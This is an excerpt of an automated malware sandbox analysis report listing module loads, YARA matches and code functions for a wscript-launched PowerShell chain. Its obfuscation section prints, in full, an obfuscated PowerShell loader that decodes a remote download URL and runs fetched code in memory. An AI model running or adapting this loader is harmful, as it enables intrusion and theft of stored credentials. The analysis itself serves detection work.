Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: CallSite.Targetore.pdbh source: powershell.exe, 00000003.00000002.2045907923.0000000007015000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: indows\System.Core.pdb0 source: powershell.exe, 00000003.00000002.2045907923.0000000007015000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000003.00000002.2045907923.0000000006FDD000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: ShellExecute("Powershell.exe", "" <#slagtstavles Talepdagogs Regnskabsa", "", "", "0");
Source: Yara match File source: 00000003.00000002.2058610754.0000000008C40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2058181579.00000000083B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2039511100.00000000057BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1898960358.00000112F5F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64string($Aftjenes)$glObal:boOTtop = [sYsTem.Text.eNcoDiNG]::AsCiI.gETsTriNg($sILDEbenssTRIbet)$gLObAL:BomuLDsGaRnEt=$BOOtTOP.subsTRing($blIps,$nomiNalIsInG)<#Schismatical Justicoat Rammel Spo
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Besmykket $reddlemen $Bulbourethral), (Nonvitrified @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Splined = [AppDomain]::CurrentDomain.GetAssemblies()$gl
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Hortensierne)), $Agerhnsndretningsarkitekten).DefineDynamicModule($Sprogblomsts, $false).DefineType($Infiksformerne, $Airbusses, [Syst
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64string($Aftjenes)$glObal:boOTtop = [sYsTem.Text.eNcoDiNG]::AsCiI.gETsTriNg($sILDEbenssTRIbet)$gLObAL:BomuLDsGaRnEt=$BOOtTOP.subsTRing($blIps,$nomiNalIsInG)<#Schismatical Justicoat Rammel Spo
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#slagtstavles Talepdagogs Regnskabsafdelings Wardwomen Yokeage #>;$Ganespalter144='Triumferne';<#Whirler Kjepladser Fllesmngde #>;$Gader=$adawe+$host.UI;If ($Gader) {$Fuglearter++;}function Drunkometer($Microfibril){$Reflation=$Elektromotoren+$Microfibril.'Length'-$Fuglearter; for( $Apoplastogamous=3;$Apoplastogamous -lt $Reflation;$Apoplastogamous+=4){$Wettability='Compotation';$Forbrugermotiveringer223+=$Microfibril[$Apoplastogamous];$Dimetient='Rememberers';}$Forbrugermotiveringer223;}function Fusionsdokumentet($Achlorhydria){ &($Companioning) ($Achlorhydria);}$Malie=Drunkometer 'smaM unospuz kaiProlplal ssaO,s/ste5Dep. la0Rep sca( rWB,uiD.mnResdVekoFa wC ms ud BifNFreTRoi Kog1Bes0Apo.Cal0sip;Fir eW B.iP rnsto6pro4 at; Ni abexCa.6Ma 4 ct;Ite Gulrsu,vsev:kos1 la2s.l1 Gr.The0Ged)Udk subGBone DocBl kg,loste/Pre2Pon0Mat1 Un0Reh0F.r1Emb0Dod1Dyp BreFHypiCharsnae spf amo R xPla/Ha.1 u2H t1Goi.run0D,r ';$Partitioned=Drunkometer 'Domuou,sU teNonR El-CocaGerGEddeRhoNT gtInd ';$Konkursbehandlingens=Drunkometer 'dephDatt.lmtPispC u:In /Cli/ jee stq P u C iInspBud4 K .Ti.sAnahGeloTheppon/ChiF unvAvlMNymV ModEelpOveFslug,ra/ExtAsaftEn oHollTrosWov.CivrAstaP.arMer ';$Afspadseringspenge=Drunkometer 's,a>Dif ';$Companioning=Drunkometer ' ui BrEC.xXMik ';$Congressist='Banditter';$Flunkeyhood='\Plasmagel.Ref';Fusionsdokumentet (Drunkometer ' R $,drGIs l oOga BEx Aseklatt:Tr,ILrerMumRsvvIspaGantAskybAcalencyEpa=La,$s,vE B NCanvR a:Renast PHigpsupD Boa ssTFika f+Rin$MulFPhelsugu,erNsenksaleTesy OpHC looveoBe.DBrn ');Fusionsdokumentet (Drunkometer 'Bip$Hypg T LKrooMarBTa A.shlbas:Vanb ndAR.cD ale riFPleo TjRs lms oAspra Cal R E M T,ri=Unf$Tr K nooNoun ftKMisuKrirP,dsLasBForE skHIntANo NsafD,ecL.ugI N nBlag H.e,einsp s su.ThescolPLamLMaair,iTRib( fo$ ChaCo f PlsUd.PPupaResdAe s lyEUptRB liB kN soG ,dsBisPNgteUd.N C G,niePsa) Ac ');Fusionsdokumentet (Drunkometer 'Tio[chinU iE veTifr.salsEleE Unr favAulIH lCst.eQuapsenoRapIBa,NA eTK lM Kra A.N BeABioGRege ImRByl]sam:Re : Tys iEcopCLeoUGrur GaIEndtHeaY appAf.rUnroFutTParO CoCspao roLsp U.v=Jor on[TorNdukEetat o.No.s .oE b.cAriU A,rpomi anTL,eYLftPUroRProOPhitMalOLntC Dio orLRumt UdYAlap VaEs r]Ani: on:OrdTPauldatsAba1Bld2Dis ');$Konkursbehandlingens=$Badeformaalet[0];$Tilkendegivelsers=(Drunkometer 'Ma $Te.g,ynLwhoORe,bUnsAK slPse: reHAddi.ndlNonIPlu=UfonAlke ,eWMas-UdlOViob urjsniEBeaCDistElf Op sB sytahsseeTKlae ivMI,o. alNBefEObjtsne. unWBagesukbGaucsupLseeiXl E KnNsogTRjs ');Fusionsdokumentet ($Tilkendegivelsers);Fusionsdokumentet (Drunkometer ' ac$DemH sli smlBefi Ph.PinHR ieUn aOrddFodeKarrUresspe[ am$ urPAngaI.dr MatFatiG ntTiliUmboM snProePurdT,t]Upp=Kla$segMTamaPoll oriAf eFot ');$Daddocky=Drunkometer ' pu$La HTe,i valDipiP,l.BygDdoroE,awB dnParlMesoPo aTapdEnuFE,hitrnl MoeGri(Dat$MonKcosoUgjnsqukabsu VarGifsDrubUnceA.kh aaForn T ds,mlLitiDisnsuhgHile ednsi somb,Don$GelB AtaUdvje
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#slagtstavles Talepdagogs Regnskabsafdelings Wardwomen Yokeage #>;$Ganespalter144='Triumferne';<#Whirler Kjepladser Fllesmngde #>;$Gader=$adawe+$host.UI;If ($Gader) {$Fuglearter++;}function Drunkometer($Microfibril){$Reflation=$Elektromotoren+$Microfibril.'Length'-$Fuglearter; for( $Apoplastogamous=3;$Apoplastogamous -lt $Reflation;$Apoplastogamous+=4){$Wettability='Compotation';$Forbrugermotiveringer223+=$Microfibril[$Apoplastogamous];$Dimetient='Rememberers';}$Forbrugermotiveringer223;}function Fusionsdokumentet($Achlorhydria){ &($Companioning) ($Achlorhydria);}$Malie=Drunkometer 'smaM unospuz kaiProlplal ssaO,s/ste5Dep. la0Rep sca( rWB,uiD.mnResdVekoFa wC ms ud BifNFreTRoi Kog1Bes0Apo.Cal0sip;Fir eW B.iP rnsto6pro4 at; Ni abexCa.6Ma 4 ct;Ite Gulrsu,vsev:kos1 la2s.l1 Gr.The0Ged)Udk subGBone DocBl kg,loste/Pre2Pon0Mat1 Un0Reh0F.r1Emb0Dod1Dyp BreFHypiCharsnae spf amo R xPla/Ha.1 u2H t1Goi.run0D,r ';$Partitioned=Drunkometer 'Domuou,sU teNonR El-CocaGerGEddeRhoNT gtInd ';$Konkursbehandlingens=Drunkometer 'dephDatt.lmtPispC u:In /Cli/ jee stq P u C iInspBud4 K .Ti.sAnahGeloTheppon/ChiF unvAvlMNymV ModEelpOveFslug,ra/ExtAsaftEn oHollTrosWov.CivrAstaP.arMer ';$Afspadseringspenge=Drunkometer 's,a>Dif ';$Companioning=Drunkometer ' ui BrEC.xXMik ';$Congressist='Banditter';$Flunkeyhood='\Plasmagel.Ref';Fusionsdokumentet (Drunkometer ' R $,drGIs l oOga BEx Aseklatt:Tr,ILrerMumRsvvIspaGantAskybAcalencyEpa=La,$s,vE B NCanvR a:Renast PHigpsupD Boa ssTFika f+Rin$MulFPhelsugu,erNsenksaleTesy OpHC looveoBe.DBrn ');Fusionsdokumentet (Drunkometer 'Bip$Hypg T LKrooMarBTa A.shlbas:Vanb ndAR.cD ale riFPleo TjRs lms oAspra Cal R E M T,ri=Unf$Tr K nooNoun ftKMisuKrirP,dsLasBForE skHIntANo NsafD,ecL.ugI N nBlag H.e,einsp s su.ThescolPLamLMaair,iTRib( fo$ ChaCo f PlsUd.PPupaResdAe s lyEUptRB liB kN soG ,dsBisPNgteUd.N C G,niePsa) Ac ');Fusionsdokumentet (Drunkometer 'Tio[chinU iE veTifr.salsEleE Unr favAulIH lCst.eQuapsenoRapIBa,NA eTK lM Kra A.N BeABioGRege ImRByl]sam:Re : Tys iEcopCLeoUGrur GaIEndtHeaY appAf.rUnroFutTParO CoCspao roLsp U.v=Jor on[TorNdukEetat o.No.s .oE b.cAriU A,rpomi anTL,eYLftPUroRProOPhitMalOLntC Dio orLRumt UdYAlap VaEs r]Ani: on:OrdTPauldatsAba1Bld2Dis ');$Konkursbehandlingens=$Badeformaalet[0];$Tilkendegivelsers=(Drunkometer 'Ma $Te.g,ynLwhoORe,bUnsAK slPse: reHAddi.ndlNonIPlu=UfonAlke ,eWMas-UdlOViob urjsniEBeaCDistElf Op sB sytahsseeTKlae ivMI,o. alNBefEObjtsne. unWBagesukbGaucsupLseeiXl E KnNsogTRjs ');Fusionsdokumentet ($Tilkendegivelsers);Fusionsdokumentet (Drunkometer ' ac$DemH sli smlBefi Ph.PinHR ieUn aOrddFodeKarrUresspe[ am$ urPAngaI.dr MatFatiG ntTiliUmboM snProePurdT,t]Upp=Kla$segMTamaPoll oriAf eFot ');$Daddocky=Drunkometer ' pu$La HTe,i valDipiP,l.BygDdoroE,awB dnParlMesoPo aTapdEnuFE,hitrnl MoeGri(Dat$MonKcosoUgjnsqukabsu VarGifsDrubUnceA.kh aaForn T ds,mlLitiDisnsuhgHile ednsi somb,Don$GelB AtaUdvje
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#slagtstavles Talepdagogs Regnskabsafdelings Wardwomen Yokeage #>;$Ganespalter144='Triumferne';<#Whirler Kjepladser Fllesmngde #>;$Gader=$adawe+$host.UI;If ($Gader) {$Fuglearter++;}function Drunkometer($Microfibril){$Reflation=$Elektromotoren+$Microfibril.'Length'-$Fuglearter; for( $Apoplastogamous=3;$Apoplastogamous -lt $Reflation;$Apoplastogamous+=4){$Wettability='Compotation';$Forbrugermotiveringer223+=$Microfibril[$Apoplastogamous];$Dimetient='Rememberers';}$Forbrugermotiveringer223;}function Fusionsdokumentet($Achlorhydria){ &($Companioning) ($Achlorhydria);}$Malie=Drunkometer 'smaM unospuz kaiProlplal ssaO,s/ste5Dep. la0Rep sca( rWB,uiD.mnResdVekoFa wC ms ud BifNFreTRoi Kog1Bes0Apo.Cal0sip;Fir eW B.iP rnsto6pro4 at; Ni abexCa.6Ma 4 ct;Ite Gulrsu,vsev:kos1 la2s.l1 Gr.The0Ged)Udk subGBone DocBl kg,loste/Pre2Pon0Mat1 Un0Reh0F.r1Emb0Dod1Dyp BreFHypiCharsnae spf amo R xPla/Ha.1 u2H t1Goi.run0D,r ';$Partitioned=Drunkometer 'Domuou,sU teNonR El-CocaGerGEddeRhoNT gtInd ';$Konkursbehandlingens=Drunkometer 'dephDatt.lmtPispC u:In /Cli/ jee stq P u C iInspBud4 K .Ti.sAnahGeloTheppon/ChiF unvAvlMNymV ModEelpOveFslug,ra/ExtAsaftEn oHollTrosWov.CivrAstaP.arMer ';$Afspadseringspenge=Drunkometer 's,a>Dif ';$Companioning=Drunkometer ' ui BrEC.xXMik ';$Congressist='Banditter';$Flunkeyhood='\Plasmagel.Ref';Fusionsdokumentet (Drunkometer ' R $,drGIs l oOga BEx Aseklatt:Tr,ILrerMumRsvvIspaGantAskybAcalencyEpa=La,$s,vE B NCanvR a:Renast PHigpsupD Boa ssTFika f+Rin$MulFPhelsugu,erNsenksaleTesy OpHC looveoBe.DBrn ');Fusionsdokumentet (Drunkometer 'Bip$Hypg T LKrooMarBTa A.shlbas:Vanb ndAR.cD ale riFPleo TjRs lms oAspra Cal R E M T,ri=Unf$Tr K nooNoun ftKMisuKrirP,dsLasBForE skHIntANo NsafD,ecL.ugI N nBlag H.e,einsp s su.ThescolPLamLMaair,iTRib( fo$ ChaCo f PlsUd.PPupaResdAe s lyEUptRB liB kN soG ,dsBisPNgteUd.N C G,niePsa) Ac ');Fusionsdokumentet (Drunkometer 'Tio[chinU iE veTifr.salsEleE Unr favAulIH lCst.eQuapsenoRapIBa,NA eTK lM Kra A.N BeABioGRege ImRByl]sam:Re : Tys iEcopCLeoUGrur GaIEndtHeaY appAf.rUnroFutTParO CoCspao roLsp U.v=Jor on[TorNdukEetat o.No.s .oE b.cAriU A,rpomi anTL,eYLftPUroRProOPhitMalOLntC Dio orLRumt UdYAlap VaEs r]Ani: on:OrdTPauldatsAba1Bld2Dis ');$Konkursbehandlingens=$Badeformaalet[0];$Tilkendegivelsers=(Drunkometer 'Ma $Te.g,ynLwhoORe,bUnsAK slPse: reHAddi.ndlNonIPlu=UfonAlke ,eWMas-UdlOViob urjsniEBeaCDistElf Op sB sytahsseeTKlae ivMI,o. alNBefEObjtsne. unWBagesukbGaucsupLseeiXl E KnNsogTRjs ');Fusionsdokumentet ($Tilkendegivelsers);Fusionsdokumentet (Drunkometer ' ac$DemH sli smlBefi Ph.PinHR ieUn aOrddFodeKarrUresspe[ am$ urPAngaI.dr MatFatiG ntTiliUmboM snProePurdT,t]Upp=Kla$segMTamaPoll oriAf eFot ');$Daddocky=Drunkometer ' pu$La HTe,i valDipiP,l.BygDdoroE,awB dnParlMesoPo aTapdEnuFE,hitrnl MoeGri(Dat$MonKcosoUgjnsqukabsu VarGifsDrubUnceA.kh aaForn T ds,mlLitiDisnsuhgHile ednsi somb,Don$GelB AtaUdvje Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 10_2_004044A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B7EA711 push eax; iretd 1_2_00007FFD9B7EA731
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B7E00AD pushad ; iretd 1_2_00007FFD9B7E00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B8B7B16 push ebp; ret 1_2_00007FFD9B8B7B9A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B8BB1F7 push ds; ret 1_2_00007FFD9B8BB1F8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B8B79C5 push ebp; ret 1_2_00007FFD9B8B79C8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B8B7F4E push ecx; ret 1_2_00007FFD9B8B7F50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_04463727 push eax; iretd 3_2_04463761
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_08B63BE5 push cs; iretd 3_2_08B63BE6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_08B60D85 push es; iretd 3_2_08B60DA3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_08B640D9 push cs; ret 3_2_08B640DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_08B6004B push edx; iretd 3_2_08B6004C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_08B641DE push EB73DDCBh; ret 3_2_08B641E5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_08B603BB push 95470BA8h; ret 3_2_08B603C6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_08B646F6 push edx; iretd 3_2_08B64701
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_1FC72806 push ecx; ret 8_2_1FC72819
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_03B903BB push 95470BA8h; ret 8_2_03B903C6
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_03B93BE5 push cs; iretd 8_2_03B93BE6
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_03B946F6 push edx; iretd 8_2_03B94701
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_03B90D85 push es; iretd 8_2_03B90DA3
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_03B941DE push EB73DDCBh; ret 8_2_03B941E5
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_03B940D9 push cs; ret 8_2_03B940DA
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_03B9004B push edx; iretd 8_2_03B9004C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0044693D push ecx; ret 10_2_0044694D
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0044DB70 push eax; ret 10_2_0044DB84
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0044DB70 push eax; ret 10_2_0044DBAC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00451D54 push eax; ret 10_2_00451D61
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0044B090 push eax; ret 12_2_0044B0A4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0044B090 push eax; ret 12_2_0044B0CC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00444E71 push ecx; ret 12_2_00444E81
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00414060 push eax; ret 13_2_00414074
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00414060 push eax; ret 13_2_0041409C

Boot Survival

barindex
